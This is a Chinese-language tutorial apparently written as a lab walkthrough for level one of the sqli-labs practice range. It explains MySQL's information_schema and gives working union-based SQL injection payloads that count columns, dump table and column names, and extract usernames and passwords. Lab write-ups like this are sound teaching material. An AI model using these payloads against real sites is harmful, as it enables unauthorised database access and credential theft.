前言
我们在使用Sql-libs靶场进行Sql注入实验的时候,前提要求我们对mysql数据库结构要有一个大概的了解,因为mysql5.0以上的版本都会自带一个名为information_schema的数据库,这个数据库下面会有columns和tables两个表。
tables这个表的table_name字段下面包含了所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库,了解了这些后会对我们进行Sql注入的时候有很大的帮助。
一、Sql注入的原理是什么?
用户在访问web界面的时候,web程序对用户所输入的数据的合法性没有进行判断或者过滤不严格,攻击者可以利用这个漏洞,在web程序中将事先定义好的查询语句的结尾上插入额外的Sql语句,在管理员不知情的情况下实现非法操作,以此来欺骗数据库并查询自己所需要的信息,比如:用户的密码和账号等
二、Sql的注入过程
1.Sql-lis第一关
判断是否存在sql注入?
1.提示我们输入id,输入?id=1,在数据库中查询到如下字段
2.通过输入的id的值不同,我们发现返回的内容会不同
3.判断注入的类型,是否为拼接,并且是字符型还是符号型
我们可以输入?id=1\,通过加 \ 的方式判断闭合,\后面的符号就是闭合符号,见页面出现错误,即位字符型
输入?id=1‘ 报错
在上述字段后加入–+,显示正常,说明是单引号 ’ 闭合
4.判断字段数
输入’ order by 3 --+,可见正常
输入’ order by 4–+ 报错,说明只有三个字段
5.联合查询7
因为字段数为3,所以使用 union select 1,2,3进行查询 ,判断回显点
我们可以将上述语句的2或者3改成database()来显示数据库名
6.联表查询,爆表名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
7.爆字段名
union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
8.爆字段中的内容
根据上一步爆出的字段名usernmae,password进行查询即可
union select 1,2,group_concat(username,password) from users
至此第一关就结束了,第二关与第一关的步骤相同,不同的是第二关是数字型注入
总结
Sql注入要求我们对数据库的结构要有一个大概的了解,这要就能更容易去操作!!!